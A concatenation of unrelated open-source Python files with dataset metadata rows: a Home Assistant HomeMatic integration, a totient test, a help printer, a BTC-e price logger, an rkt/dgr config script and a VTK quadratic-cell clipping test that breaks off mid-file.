hass.data[DATA_HOMEMATIC] = homematic = HMConnection(
local=config[DOMAIN].get(CONF_LOCAL_IP),
localport=config[DOMAIN].get(CONF_LOCAL_PORT, DEFAULT_LOCAL_PORT),
remotes=remotes,
systemcallback=bound_system_callback,
interface_id='homeassistant'
)
# Start server thread, connect to hosts, initialize to receive events
homematic.start()
# Stops server when HASS is shutting down
hass.bus.listen_once(
EVENT_HOMEASSISTANT_STOP, hass.data[DATA_HOMEMATIC].stop)
# Init homematic hubs
entity_hubs = []
for hub_name in conf[CONF_HOSTS].keys():
entity_hubs.append(HMHub(hass, homematic, hub_name))
def _hm_service_virtualkey(service):
"""Service to handle virtualkey servicecalls."""
address = service.data.get(ATTR_ADDRESS)
channel = service.data.get(ATTR_CHANNEL)
param = service.data.get(ATTR_PARAM)
# Device not found
hmdevice = _device_from_servicecall(hass, service)
if hmdevice is None:
_LOGGER.error("%s not found for service virtualkey!", address)
return
# Parameter doesn't exist for device
if param not in hmdevice.ACTIONNODE:
_LOGGER.error("%s not datapoint in hm device %s", param, address)
return
# Channel doesn't exist for device
if channel not in hmdevice.ACTIONNODE[param]:
_LOGGER.error("%i is not a channel in hm device %s",
channel, address)
return
# Call parameter
hmdevice.actionNodeData(param, True, channel)
hass.services.register(
DOMAIN, SERVICE_VIRTUALKEY, _hm_service_virtualkey,
schema=SCHEMA_SERVICE_VIRTUALKEY)
def _service_handle_value(service):
"""Service to call setValue method for HomeMatic system variable."""
entity_ids = service.data.get(ATTR_ENTITY_ID)
name = service.data[ATTR_NAME]
value = service.data[ATTR_VALUE]
if entity_ids:
entities = [entity for entity in entity_hubs if
entity.entity_id in entity_ids]
else:
entities = entity_hubs
if not entities:
_LOGGER.error("No HomeMatic hubs available")
return
for hub in entities:
hub.hm_set_variable(name, value)
hass.services.register(
DOMAIN, SERVICE_SET_VARIABLE_VALUE, _service_handle_value,
schema=SCHEMA_SERVICE_SET_VARIABLE_VALUE)
def _service_handle_reconnect(service):
"""Service to reconnect all HomeMatic hubs."""
homematic.reconnect()
hass.services.register(
DOMAIN, SERVICE_RECONNECT, _service_handle_reconnect,
schema=SCHEMA_SERVICE_RECONNECT)
def _service_handle_device(service):
"""Service to call setValue method for HomeMatic devices."""
address = service.data.get(ATTR_ADDRESS)
channel = service.data.get(ATTR_CHANNEL)
param = service.data.get(ATTR_PARAM)
value = service.data.get(ATTR_VALUE)
# Device not found
hmdevice = _device_from_servicecall(hass, service)
if hmdevice is None:
_LOGGER.error("%s not found!", address)
return
hmdevice.setValue(param, value, channel)
hass.services.register(
DOMAIN, SERVICE_SET_DEVICE_VALUE, _service_handle_device,
schema=SCHEMA_SERVICE_SET_DEVICE_VALUE)
def _service_handle_install_mode(service):
"""Service to set interface into install mode."""
interface = service.data.get(ATTR_INTERFACE)
mode = service.data.get(ATTR_MODE)
time = service.data.get(ATTR_TIME)
address = service.data.get(ATTR_ADDRESS)
homematic.setInstallMode(interface, t=time, mode=mode, address=address)
hass.services.register(
DOMAIN, SERVICE_SET_INSTALL_MODE, _service_handle_install_mode,
schema=SCHEMA_SERVICE_SET_INSTALL_MODE)
def _service_put_paramset(service):
"""Service to call the putParamset method on a HomeMatic connection."""
interface = service.data.get(ATTR_INTERFACE)
address = service.data.get(ATTR_ADDRESS)
paramset_key = service.data.get(ATTR_PARAMSET_KEY)
# When passing in the paramset from a YAML file we get an OrderedDict
# here instead of a dict, so add this explicit cast.
# The service schema makes sure that this cast works.
paramset = dict(service.data.get(ATTR_PARAMSET))
_LOGGER.debug(
"Calling putParamset: %s, %s, %s, %s",
interface, address, paramset_key, paramset
)
homematic.putParamset(interface, address, paramset_key, paramset)
hass.services.register(
DOMAIN, SERVICE_PUT_PARAMSET, _service_put_paramset,
schema=SCHEMA_SERVICE_PUT_PARAMSET)
return True
def _system_callback_handler(hass, config, src, *args):
"""System callback handler."""
# New devices available at hub
if src == 'newDevices':
(interface_id, dev_descriptions) = args
interface = interface_id.split('-')[-1]
# Device support active?
if not hass.data[DATA_CONF][interface]['connect']:
return
addresses = []
for dev in dev_descriptions:
address = dev['ADDRESS'].split(':')[0]
if address not in hass.data[DATA_STORE]:
hass.data[DATA_STORE].add(address)
addresses.append(address)
# Register EVENTS
# Search all devices with an EVENTNODE that includes data
bound_event_callback = partial(_hm_event_handler, hass, interface)
for dev in addresses:
hmdevice = hass.data[DATA_HOMEMATIC].devices[interface].get(dev)
if hmdevice.EVENTNODE:
hmdevice.setEventCallback(
callback=bound_event_callback, bequeath=True)
# Create HASS entities
if addresses:
for component_name, discovery_type in (
('switch', DISCOVER_SWITCHES),
('light', DISCOVER_LIGHTS),
('cover', DISCOVER_COVER),
('binary_sensor', DISCOVER_BINARY_SENSORS),
('sensor', DISCOVER_SENSORS),
('climate', DISCOVER_CLIMATE),
('lock', DISCOVER_LOCKS)):
# Get all devices of a specific type
found_devices = _get_devices(
hass, discovery_type, addresses, interface)
# When devices of this type are found
# they are setup in HASS and a discovery event is fired
if found_devices:
discovery.load_platform(hass, component_name, DOMAIN, {
ATTR_DISCOVER_DEVICES: found_devices
}, config)
# Homegear error message
elif src == 'error':
_LOGGER.error("Error: %s", args)
(interface_id, errorcode, message) = args
hass.bus.fire(EVENT_ERROR, {
ATTR_ERRORCODE: errorcode,
ATTR_MESSAGE: message
})
def _get_devices(hass, discovery_type, keys, interface):
"""Get the HomeMatic devices for given discovery_type."""
device_arr = []
for key in keys:
device = hass.data[DATA_HOMEMATIC].devices[interface][key]
class_name = device.__class__.__name__
metadata = {}
# Class not supported by discovery type
if class_name not in HM_DEVICE_TYPES[discovery_type]:
continue
# Load metadata needed to generate a parameter list
if discovery_type == DISCOVER_SENSORS:
metadata.update(device.SENSORNODE)
elif discovery_type == DISCOVER_BINARY_SENSORS:
metadata.update(device.BINARYNODE)
else:
metadata.update({None: device.ELEMENT})
# Generate options for 1...n elements with 1...n parameters
for param, channels in metadata.items():
if param in HM_IGNORE_DISCOVERY_NODE and class_name not in \
HM_IGNORE_DISCOVERY_NODE_EXCEPTIONS.get(param, []):
continue
# Add devices
_LOGGER.debug("%s: Handling %s: %s: %s",
discovery_type, key, param, channels)
for channel in channels:
name = _create_ha_id(
name=device.NAME, channel=channel, param=param,
count=len(channels)
)
unique_id = _create_ha_id(
name=key, channel=channel, param=param,
count=len(channels)
)
device_dict = {
CONF_PLATFORM: "homematic",
ATTR_ADDRESS: key,
ATTR_INTERFACE: interface,
ATTR_NAME: name,
ATTR_CHANNEL: channel,
ATTR_UNIQUE_ID: unique_id
}
if param is not None:
device_dict[ATTR_PARAM] = param
# Add new device
try:
DEVICE_SCHEMA(device_dict)
device_arr.append(device_dict)
except vol.MultipleInvalid as err:
_LOGGER.error("Invalid device config: %s",
str(err))
return device_arr
def _create_ha_id(name, channel, param, count):
"""Generate a unique entity id."""
# HMDevice is a simple device
if count == 1 and param is None:
return name
# Has multiple elements/channels
if count > 1 and param is None:
return "{} {}".format(name, channel)
# With multiple parameters on first channel
if count == 1 and param is not None:
return "{} {}".format(name, param)
# Multiple parameters with multiple channels
if count > 1 and param is not None:
return "{} {} {}".format(name, channel, param)
def _hm_event_handler(hass, interface, device, caller, attribute, value):
"""Handle all pyhomematic device events."""
try:
channel = int(device.split(":")[1])
address = device.split(":")[0]
hmdevice = hass.data[DATA_HOMEMATIC].devices[interface].get(address)
except (TypeError, ValueError):
_LOGGER.error("Event handling channel convert error!")
return
# Return if not an event supported by device
if attribute not in hmdevice.EVENTNODE:
return
_LOGGER.debug("Event %s for %s channel %i", attribute,
hmdevice.NAME, channel)
# Keypress event
if attribute in HM_PRESS_EVENTS:
hass.bus.fire(EVENT_KEYPRESS, {
ATTR_NAME: hmdevice.NAME,
ATTR_PARAM: attribute,
ATTR_CHANNEL: channel
})
return
# Impulse event
if attribute in HM_IMPULSE_EVENTS:
hass.bus.fire(EVENT_IMPULSE, {
ATTR_NAME: hmdevice.NAME,
ATTR_CHANNEL: channel
})
return
_LOGGER.warning("Event is unknown and not forwarded")
def _device_from_servicecall(hass, service):
"""Extract HomeMatic device from service call."""
address = service.data.get(ATTR_ADDRESS)
interface = service.data.get(ATTR_INTERFACE)
if address == 'BIDCOS-RF':
address = 'BidCoS-RF'
if interface:
return hass.data[DATA_HOMEMATIC].devices[interface].get(address)
for devices in hass.data[DATA_HOMEMATIC].devices.values():
if address in devices:
return devices[address]
class HMHub(Entity):
"""The HomeMatic hub. (CCU2/HomeGear)."""
def __init__(self, hass, homematic, name):
"""Initialize HomeMatic hub."""
self.hass = hass
self.entity_id = "{}.{}".format(DOMAIN, name.lower())
self._homematic = homematic
self._variables = {}
self._name = name
self._state = None
# Load data
self.hass.helpers.event.track_time_interval(
self._update_hub, SCAN_INTERVAL_HUB)
self.hass.add_job(self._update_hub, None)
self.hass.helpers.event.track_time_interval(
self._update_variables, SCAN_INTERVAL_VARIABLES)
self.hass.add_job(self._update_variables, None)
@property
def name(self):
"""Return the name of the device."""
return self._name
@property
def should_poll(self):
"""Return false. HomeMatic Hub object updates variables."""
return False
@property
def state(self):
"""Return the state of the entity."""
return self._state
@property
def state_attributes(self):
"""Return the state attributes."""
attr = self._variables.copy()
return attr
@property
def icon(self):
"""Return the icon to use in the frontend, if any."""
return "mdi:gradient"
def _update_hub(self, now):
"""Retrieve latest state."""
service_message = self._homematic.getServiceMessages(self._name)
state = None if service_message is None else len(service_message)
# state have change?
if self._state != state:
self._state = state
self.schedule_update_ha_state()
def _update_variables(self, now):
"""Retrieve all variable data and update hmvariable states."""
variables = self._homematic.getAllSystemVariables(self._name)
if variables is None:
return
state_change = False
for key, value in variables.items():
if key in self._variables and value == self._variables[key]:
continue
state_change = True
self._variables.update({key: value})
if state_change:
self.schedule_update_ha_state()
def hm_set_variable(self, name, value):
"""Set variable value on CCU/Homegear."""
if name not in self._variables:
_LOGGER.error("Variable %s not found on %s", name, self.name)
return
old_value = self._variables.get(name)
if isinstance(old_value, bool):
value = cv.boolean(value)
else:
value = float(value)
self._homematic.setSystemVariable(self.name, name, value)
self._variables.update({name: value})
self.schedule_update_ha_state()
class HMDevice(Entity):
"""The HomeMatic device base object."""
def __init__(self, config):
"""Initialize a generic HomeMatic device."""
self._name = config.get(ATTR_NAME)
self._address = config.get(ATTR_ADDRESS)
self._interface = config.get(ATTR_INTERFACE)
self._channel = config.get(ATTR_CHANNEL)
self._state = config.get(ATTR_PARAM)
self._unique_id = config.get(ATTR_UNIQUE_ID)
self._data = {}
self._homematic = None
self._hmdevice = None
self._connected = False
self._available = False
# Set parameter to uppercase
if self._state:
self._state = self._state.upper()
async def async_added_to_hass(self):
"""Load data init callbacks."""
await self.hass.async_add_job(self.link_homematic)
@property
def unique_id(self):
"""Return unique ID. HomeMatic entity IDs are unique by default."""
return self._unique_id.replace(" ", "_")
@property
def should_poll(self):
"""Return false. HomeMatic states are pushed by the XML-RPC Server."""
return False
@property
def name(self):
"""Return the name of the device."""
return self._name
@property
def available(self):
"""Return true if device is available."""
return self._available
@property
def device_state_attributes(self):
"""Return device specific state attributes."""
attr = {}
# Generate a dictionary with attributes
for node, data in HM_ATTRIBUTE_SUPPORT.items():
# Is an attribute and exists for this object
if node in self._data:
value = data[1].get(self._data[node], self._data[node])
attr[data[0]] = value
# Static attributes
attr['id'] = self._hmdevice.ADDRESS
attr['interface'] = self._interface
return attr
def link_homematic(self):
"""Connect to HomeMatic."""
if self._connected:
return True
# Initialize
self._homematic = self.hass.data[DATA_HOMEMATIC]
self._hmdevice = \
self._homematic.devices[self._interface][self._address]
self._connected = True
try:
# Initialize datapoints of this object
self._init_data()
self._load_data_from_hm()
# Link events from pyhomematic
self._subscribe_homematic_events()
self._available = not self._hmdevice.UNREACH
except Exception as err: # pylint: disable=broad-except
self._connected = False
_LOGGER.error("Exception while linking %s: %s",
self._address, str(err))
def _hm_event_callback(self, device, caller, attribute, value):
"""Handle all pyhomematic device events."""
_LOGGER.debug("%s received event '%s' value: %s", self._name,
attribute, value)
has_changed = False
# Is data needed for this instance?
if attribute in self._data:
# Did data change?
if self._data[attribute] != value:
self._data[attribute] = value
has_changed = True
# Availability has changed
if self.available != (not self._hmdevice.UNREACH):
self._available = not self._hmdevice.UNREACH
has_changed = True
# If it has changed data point, update HASS
if has_changed:
self.schedule_update_ha_state()
def _subscribe_homematic_events(self):
"""Subscribe all required events to handle job."""
channels_to_sub = set()
# Push data to channels_to_sub from hmdevice metadata
for metadata in (self._hmdevice.SENSORNODE, self._hmdevice.BINARYNODE,
self._hmdevice.ATTRIBUTENODE,
self._hmdevice.WRITENODE, self._hmdevice.EVENTNODE,
self._hmdevice.ACTIONNODE):
for node, channels in metadata.items():
# Data is needed for this instance
if node in self._data:
# chan is current channel
if len(channels) == 1:
channel = channels[0]
else:
channel = self._channel
# Prepare for subscription
try:
channels_to_sub.add(int(channel))
except (ValueError, TypeError):
_LOGGER.error("Invalid channel in metadata from %s",
self._name)
# Set callbacks
for channel in channels_to_sub:
_LOGGER.debug(
"Subscribe channel %d from %s", channel, self._name)
self._hmdevice.setEventCallback(
callback=self._hm_event_callback, bequeath=False,
channel=channel)
def _load_data_from_hm(self):
"""Load first value from pyhomematic."""
if not self._connected:
return False
# Read data from pyhomematic
for metadata, funct in (
(self._hmdevice.ATTRIBUTENODE,
self._hmdevice.getAttributeData),
(self._hmdevice.WRITENODE, self._hmdevice.getWriteData),
(self._hmdevice.SENSORNODE, self._hmdevice.getSensorData),
(self._hmdevice.BINARYNODE, self._hmdevice.getBinaryData)):
for node in metadata:
if metadata[node] and node in self._data:
self._data[node] = funct(name=node, channel=self._channel)
return True
def _hm_set_state(self, value):
"""Set data to main datapoint."""
if self._state in self._data:
self._data[self._state] = value
def _hm_get_state(self):
"""Get data from main datapoint."""
if self._state in self._data:
return self._data[self._state]
return None
def _init_data(self):
"""Generate a data dict (self._data) from the HomeMatic metadata."""
# Add all attributes to data dictionary
for data_note in self._hmdevice.ATTRIBUTENODE:
self._data.update({data_note: STATE_UNKNOWN})
# Initialize device specific data
self._init_data_struct()
def _init_data_struct(self):
"""Generate a data dictionary from the HomeMatic device metadata."""
raise NotImplementedError
| 34.840449 | 79 | 0.627354 |
4a27da033fe99116e80f26987518a3c68e02146b | 322 | py | Python | project_euler/library/number_theory/test_euler_totient.py | cryvate/project-euler | 6ed13880d7916c34554559f5f71662a863735eda | [
"MIT"
] | null | null | null | project_euler/library/number_theory/test_euler_totient.py | cryvate/project-euler | 6ed13880d7916c34554559f5f71662a863735eda | [
"MIT"
] | 9 | 2017-02-20T23:41:40.000Z | 2017-04-16T15:36:54.000Z | project_euler/library/number_theory/test_euler_totient.py | cryvate/project-euler | 6ed13880d7916c34554559f5f71662a863735eda | [
"MIT"
] | null | null | null | import pytest
from .euler_totient import phi, phi_range
from .gcd import gcd
@pytest.mark.parametrize('n', range(100, 115))
def test_phi(n: int) -> None:
assert phi(n) == len([a for a in range(n) if gcd(a, n) == 1])
def test_phi_range(n: int=100):
assert [phi(n) for n in range(1, n + 1)] == phi_range(n)[1:]
| 23 | 65 | 0.645963 |
4a27ddee11e3f0341ecce51046ba415d44b78ab6 | 595 | py | Python | parser/functions/help.py | UHH-ISS/honeygrove-console | 9ff7bd1ab9609276fa4008d0180fdeb500fb9484 | [
"MIT"
] | 1 | 2019-03-12T16:35:33.000Z | 2019-03-12T16:35:33.000Z | parser/functions/help.py | UHH-ISS/honeygrove-console | 9ff7bd1ab9609276fa4008d0180fdeb500fb9484 | [
"MIT"
] | null | null | null | parser/functions/help.py | UHH-ISS/honeygrove-console | 9ff7bd1ab9609276fa4008d0180fdeb500fb9484 | [
"MIT"
] | null | null | null | def help(parser,logic,logging,args=0):
if args:
for k in args[0]:
try:
with open("parser/functions/help/" + str(k) + ".txt") as f:
for line in f:
parser.print(line[:len(line)-1])
except IOError as e:
parser.print(k+":command unknown")
else:
with open("parser/functions/help/help.txt") as f:
for line in f:
if line in ["\n","\r\n"]:
parser.print()
else:
parser.print(line[:len(line)-1])
| 33.055556 | 75 | 0.440336 |
4a27ddffd07c9efa007b7b70c6ac6947e91e0fba | 4,616 | py | Python | pyTrader/trade_stream.py | evanhenri/neural-network-trading-bot | a75b6c118c67ba6e00cffe68b04cbb424c759b3e | [
"MIT"
] | 18 | 2016-05-31T09:32:20.000Z | 2021-08-15T17:41:14.000Z | pyTrader/trade_stream.py | nav3van/RNN-Trading-Bot | a75b6c118c67ba6e00cffe68b04cbb424c759b3e | [
"MIT"
] | 2 | 2016-06-19T14:12:37.000Z | 2017-03-28T23:18:50.000Z | pyTrader/trade_stream.py | nav3van/RNN-Trading-Bot | a75b6c118c67ba6e00cffe68b04cbb424c759b3e | [
"MIT"
] | 9 | 2016-02-15T12:50:48.000Z | 2020-03-18T03:31:22.000Z | import os, sys, time, datetime
import urllib.request, urllib.parse, json, codecs, socket
from file_check import parent_dir
# Dynamically imports the class required for the extension returned by get_output_type
# Returns the name of the class and the imported module containing that class
def import_class_module():
module = 'sqlite_output'
temp_class_name = 'sqlite_obj'
temp_imported_class = __import__(module, fromlist=temp_class_name)
return temp_class_name, temp_imported_class
# Continue asking user for input if an entry that does not correlate to an index of _extension_list is entered
# Return user entry once a valid input has been made
def get_user_input(_extension_list):
while True:
try:
usr_input = int(input())
except ValueError:
print('***Invalid Input***\nEnter a number from 0 to ' + str(len(_extension_list) - 1) + ' inclusive')
continue
else:
if usr_input < 0 or usr_input >= len(_extension_list):
print('***Invalid Input***\nEnter a number from 0 to ' + str(len(_extension_list) - 1) + ' inclusive')
else:
return usr_input
# Returns true if api response contains valid data and false otherwise
def valid_response(_json_resp):
err_originator_desc = 'json response validation'
try:
if 'btc_usd' not in _json_resp:
return False
except ValueError as e:
store_log([err_originator_desc,e])
return True
# Returns BTC-e API response with current exchange rates
def http_request():
max_requests = 10
# Specifies how long a socket should wait for a response before timing out
socket.setdefaulttimeout(socket_timeout)
while max_requests > 0:
try:
api_request = urllib.request.Request(url, headers=headers)
api_response = urllib.request.urlopen(api_request)
json_response = json.load(reader(api_response))
if valid_response(json_response):
return json_response
else:
store_log(['***Bad response***', str(json_response)])
except urllib.request.HTTPError as e:
print('\nInvalid API response received, attempts remaining: ' + str(max_requests))
store_log(['receiving api response', e])
except Exception as e:
print('\nInvalid API response received, attempts remaining: ' + str(max_requests))
store_log(['api request', e])
max_requests -= 1
time.sleep(2)
print('***API request threshold met with no valid responses received***')
def get_trade_data():
while True:
json_obj = http_request()
g_output_object.open_output_file()
timestamp = datetime.datetime.fromtimestamp(int(json_obj['btc_usd']['updated'])).strftime('%Y%m%d%H%M%S')
g_output_object.store_output(timestamp, json_obj['btc_usd']['sell'], json_obj['btc_usd']['buy'])
sys.stdout.write("\rTrade record count = %i" % g_output_object.record_count())
sys.stdout.flush()
time.sleep(2)
def store_log(_argv):
with open(parent_dir + 'build/data/error.log', 'a+') as log_file:
log_file.write('\n/-------------------\\\n')
for argc in _argv:
if argc == _argv[0]:
log_file.write('Error occurred during ' + argc + ' at ' + str(datetime.datetime.now()))
else:
log_file.write(str(argc))
log_file.write('\n\\-------------------/\n')
log_file.close()
current_dir_oath = os.path.realpath(os.path.dirname(''))
out_dir_path = parent_dir + 'build/data/'
out_file_name = 'input.sqlite'
socket_timeout = 15
url = 'https://btc-e.com/api/3/ticker/btc_usd'
headers = {'User-Agent': 'Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.27 Safari/537.17'}
reader = codecs.getreader('utf-8')
def main():
class_name, imported_class = import_class_module()
mod_attr = getattr(imported_class, class_name)
output_path = out_dir_path + out_file_name
global g_output_object
g_output_object = mod_attr(output_path)
# http_request() is wrapped in an infinite loop. If an exception is encountered during http_request(),
# the local infinite loop within that function will break. However, the infinite loop below will prevent
# execution from stopping.
while True:
get_trade_data()
store_log(['http_request() infinite loop', ['Pausing for 2 seconds before re-initiating request sequence']])
time.sleep(2)
if __name__ == '__main__':
main()
| 37.225806 | 130 | 0.660745 |
4a27de18ec7994b8a36402ede71dde14dc6b4a7a | 2,303 | py | Python | runtime/config.py | netturpin/enjoliver | 9700470939da40ff84304af6e8c7210a5fd693a4 | [
"MIT"
] | 11 | 2017-11-06T08:42:55.000Z | 2021-01-08T11:01:02.000Z | runtime/config.py | netturpin/enjoliver | 9700470939da40ff84304af6e8c7210a5fd693a4 | [
"MIT"
] | 7 | 2017-12-28T12:05:50.000Z | 2021-04-02T15:04:46.000Z | runtime/config.py | netturpin/enjoliver | 9700470939da40ff84304af6e8c7210a5fd693a4 | [
"MIT"
] | 4 | 2017-11-08T10:03:31.000Z | 2018-06-03T17:59:43.000Z | #! /usr/bin/env python3
import json
import os
def rkt_path_d(path):
rkt_data = "/tmp/rkt-data"
data = {
"rktKind": "paths",
"rktVersion": "v1",
"data": rkt_data,
"stage1-images": "%s/rkt" % path
}
try:
os.makedirs("%s/paths.d/" % path)
except OSError:
pass
try:
os.makedirs(rkt_data)
except OSError:
pass
with open("%s/paths.d/paths.json" % path, "w") as f:
json.dump(data, f)
def rkt_stage1_d(path):
data = {
"rktKind": "stage1",
"rktVersion": "v1",
"name": "coreos.com/rkt/stage1-coreos",
"version": "v1.27.0",
"location": "%s/rkt/stage1-coreos.aci" % path
}
try:
os.makedirs("%s/stage1.d/" % path)
except OSError:
pass
with open("%s/stage1.d/coreos.json" % path, "w") as f:
json.dump(data, f)
def dgr_config(path):
data = [
"targetWorkDir: %s/target" % path,
"rkt:",
" path: %s/rkt/rkt" % path,
" insecureOptions: [http, image]",
" dir: %s/data" % path,
" localConfig: %s" % path,
" systemConfig: %s" % path,
" userConfig: %s" % path,
" trustKeysFromHttps: false",
" noStore: false",
" storeOnly: false",
"push:",
' url: "http://enjoliver.local"',
]
with open("%s/config.yml" % path, "w") as f:
f.write("\n".join(data) + "\n")
def acserver_config(path):
data = [
"api:",
" serverName: enjoliver.local",
" port: 80",
"storage:",
" unsigned: true",
" allowOverride: true",
' rootPath: %s/acserver.d' % path,
]
with open("%s/ac-config.yml" % path, "w") as f:
f.write("\n".join(data) + "\n")
with open("/etc/hosts") as f:
for l in f:
if "enjoliver.local" in l:
return
try:
with open("/etc/hosts", 'a') as f:
f.write("172.20.0.1 enjoliver.local # added by %s\n" % os.path.abspath(__file__))
except IOError:
print("/etc/hosts ignore: run as sudo")
if __name__ == "__main__":
pwd = os.path.dirname(os.path.abspath(__file__))
rkt_path_d(pwd)
rkt_stage1_d(pwd)
dgr_config(pwd)
acserver_config(pwd)
| 24.763441 | 93 | 0.508467 |
4a27dfb560d1dd57b6f7ca7ec4fcd258965e5c3a | 606 | py | Python | Cuatrimestres/1/TeoriadeControlI/python/trayectoriafiltrada.py | chelizalde/DCA | 34fd4d500117a9c0a75b979b8b0f121c1992b9dc | [
"MIT"
] | null | null | null | Cuatrimestres/1/TeoriadeControlI/python/trayectoriafiltrada.py | chelizalde/DCA | 34fd4d500117a9c0a75b979b8b0f121c1992b9dc | [
"MIT"
] | null | null | null | Cuatrimestres/1/TeoriadeControlI/python/trayectoriafiltrada.py | chelizalde/DCA | 34fd4d500117a9c0a75b979b8b0f121c1992b9dc | [
"MIT"
] | 1 | 2021-03-20T12:44:13.000Z | 2021-03-20T12:44:13.000Z | #!/usr/bin/env python
from matplotlib.pyplot import plot, text, axis, grid, gca, xticks, yticks, savefig
from numpy import exp, abs, linspace, sin
x = linspace(0, 1.2, 200)
fun = exp(-4.5*x)*(1-sin(13*x))
exp = exp(-3*x) + 0.1
plot(x, fun)
plot(x, exp)
text(0.22, 0.15, r'$\xi(t)$', fontsize=28)
text(0.425, 0.425, r'$k e^{-\alpha t}$', fontsize=28)
axis([-0.2, 1.2, -0.2, 1.2])
grid(True)
xticks([0])
yticks([0])
a = gca()
a.set_xticklabels([])
a.set_yticklabels([])
# Se guarda la figura en la misma carpeta
savefig("trayectoriafiltrada.pdf", bbox_inches='tight', pad_inches=0, transparent="True")
| 23.307692 | 89 | 0.653465 |
4a27e0b7767999ba6bbb28b8529830843554582f | 1,086 | py | Python | password_policies/urls.py | BuildingRobotics/django-password-policies | 8b754ca8d10a4cf2b56a8c5f9e46f5384f492eb9 | [
"BSD-3-Clause"
] | null | null | null | password_policies/urls.py | BuildingRobotics/django-password-policies | 8b754ca8d10a4cf2b56a8c5f9e46f5384f492eb9 | [
"BSD-3-Clause"
] | 1 | 2019-09-17T10:09:29.000Z | 2019-09-17T16:56:54.000Z | password_policies/urls.py | BuildingRobotics/django-password-policies | 8b754ca8d10a4cf2b56a8c5f9e46f5384f492eb9 | [
"BSD-3-Clause"
] | null | null | null | from __future__ import absolute_import
from django.conf.urls import url
from password_policies.views import PasswordChangeFormView
from password_policies.views import PasswordChangeDoneView
from password_policies.views import PasswordResetCompleteView
from password_policies.views import PasswordResetConfirmView
from password_policies.views import PasswordResetFormView
from password_policies.views import PasswordResetDoneView
urlpatterns = [
url(r'^change/done/$', PasswordChangeDoneView.as_view(),
name="password_change_done"),
url(r'^change/$', PasswordChangeFormView.as_view(), name="password_change"),
url(r'^reset/$', PasswordResetFormView.as_view(), name="password_reset"),
url(r'^reset/complete/$', PasswordResetCompleteView.as_view(),
name="password_reset_complete"),
url(r'^reset/confirm/([0-9A-Za-z_\-]+)/([0-9A-Za-z]{1,13})/([0-9A-Za-z-=_]{1,32})/$',
PasswordResetConfirmView.as_view(),
name="password_reset_confirm"),
url(r'^reset/done/$', PasswordResetDoneView.as_view(),
name="password_reset_done"),
]
| 43.44 | 89 | 0.754144 |
4a27e11eb834c0d073b2977c55c63d8a636565c8 | 719 | py | Python | src/bin/device.py | a-t-0/python-keyboard-drivers | 47535bf8cafb4c10ffba653be8fed3712d05de57 | [
"BSD-2-Clause"
] | 2 | 2018-08-25T09:45:55.000Z | 2021-03-04T14:20:06.000Z | src/bin/device.py | a-t-0/python-keyboard-drivers | 47535bf8cafb4c10ffba653be8fed3712d05de57 | [
"BSD-2-Clause"
] | null | null | null | src/bin/device.py | a-t-0/python-keyboard-drivers | 47535bf8cafb4c10ffba653be8fed3712d05de57 | [
"BSD-2-Clause"
] | 1 | 2021-03-04T14:59:40.000Z | 2021-03-04T14:59:40.000Z |
"""
See LICENSE for more information.
See README.md for building instructions
and usage examples.
"""
import evdev # coomunicate w/ kernel I/O interface
import sys # access system calls
class DEVICE (object):
def __init__ (self):
self.device_file = '/dev/input/event5'
# create kernel interface
self.device = evdev.InputDevice(self.device_file)
def _detach_kernel_driver (self):
"""
tell the kernel to relase control of the device
"""
self.device.grab()
def _attach_kernel_driver (self):
"""
tell the kernel to take back control of the device
"""
self.device.ungrab()
def _exit (self):
"""
call the exit sys-call and cleanup
"""
self._attach_kernel_driver()
sys.exit(0)
| 18.435897 | 52 | 0.703755 |
4a27e1a35d2f427467f736dd00edc6996919d915 | 34,625 | py | Python | Filters/General/Testing/Python/clipQuadraticCells.py | jasper-yeh/VtkDotNet | 84b56f781cb511694e4380cebfb245bbefe2560b | [
"BSD-3-Clause"
] | 3 | 2020-06-20T23:31:06.000Z | 2021-01-11T02:17:16.000Z | Filters/General/Testing/Python/clipQuadraticCells.py | jasper-yeh/VtkDotNet | 84b56f781cb511694e4380cebfb245bbefe2560b | [
"BSD-3-Clause"
] | 1 | 2020-12-01T23:21:02.000Z | 2020-12-02T23:44:43.000Z | Filters/General/Testing/Python/clipQuadraticCells.py | jasper-yeh/VtkDotNet | 84b56f781cb511694e4380cebfb245bbefe2560b | [
"BSD-3-Clause"
] | 5 | 2015-10-09T04:12:29.000Z | 2021-12-15T16:57:11.000Z | #!/usr/bin/env python
import sys
import vtk
from vtk.test import Testing
from vtk.util.misc import vtkGetDataRoot
VTK_DATA_ROOT = vtkGetDataRoot()
# Prevent .pyc files being created.
# Stops the vtk source being polluted
# by .pyc files.
sys.dont_write_bytecode = True
import backdrop
# clip every quadratic cell type
# Create a scene with one of each cell type.
# QuadraticEdge
edgePoints = vtk.vtkPoints()
edgePoints.SetNumberOfPoints(3)
edgePoints.InsertPoint(0, 0, 0, 0)
edgePoints.InsertPoint(1, 1.0, 0, 0)
edgePoints.InsertPoint(2, 0.5, 0.25, 0)
edgeScalars = vtk.vtkFloatArray()
edgeScalars.SetNumberOfTuples(3)
edgeScalars.InsertValue(0, 0.0)
edgeScalars.InsertValue(1, 0.0)
edgeScalars.InsertValue(2, 0.9)
aEdge = vtk.vtkQuadraticEdge()
aEdge.GetPointIds().SetId(0, 0)
aEdge.GetPointIds().SetId(1, 1)
aEdge.GetPointIds().SetId(2, 2)
aEdgeGrid = vtk.vtkUnstructuredGrid()
aEdgeGrid.Allocate(1, 1)
aEdgeGrid.InsertNextCell(aEdge.GetCellType(), aEdge.GetPointIds())
aEdgeGrid.SetPoints(edgePoints)
aEdgeGrid.GetPointData().SetScalars(edgeScalars)
edgeclips = vtk.vtkClipDataSet()
edgeclips.SetInputData(aEdgeGrid)
edgeclips.SetValue(0.5)
aEdgeclipMapper = vtk.vtkDataSetMapper()
aEdgeclipMapper.SetInputConnection(edgeclips.GetOutputPort())
aEdgeclipMapper.ScalarVisibilityOff()
aEdgeMapper = vtk.vtkDataSetMapper()
aEdgeMapper.SetInputData(aEdgeGrid)
aEdgeMapper.ScalarVisibilityOff()
aEdgeActor = vtk.vtkActor()
aEdgeActor.SetMapper(aEdgeMapper)
aEdgeActor.GetProperty().SetRepresentationToWireframe()
aEdgeActor.GetProperty().SetAmbient(1.0)
aEdgeclipActor = vtk.vtkActor()
aEdgeclipActor.SetMapper(aEdgeclipMapper)
aEdgeclipActor.GetProperty().BackfaceCullingOn()
aEdgeclipActor.GetProperty().SetAmbient(1.0)
# Quadratic triangle
triPoints = vtk.vtkPoints()
triPoints.SetNumberOfPoints(6)
triPoints.InsertPoint(0, 0.0, 0.0, 0.0)
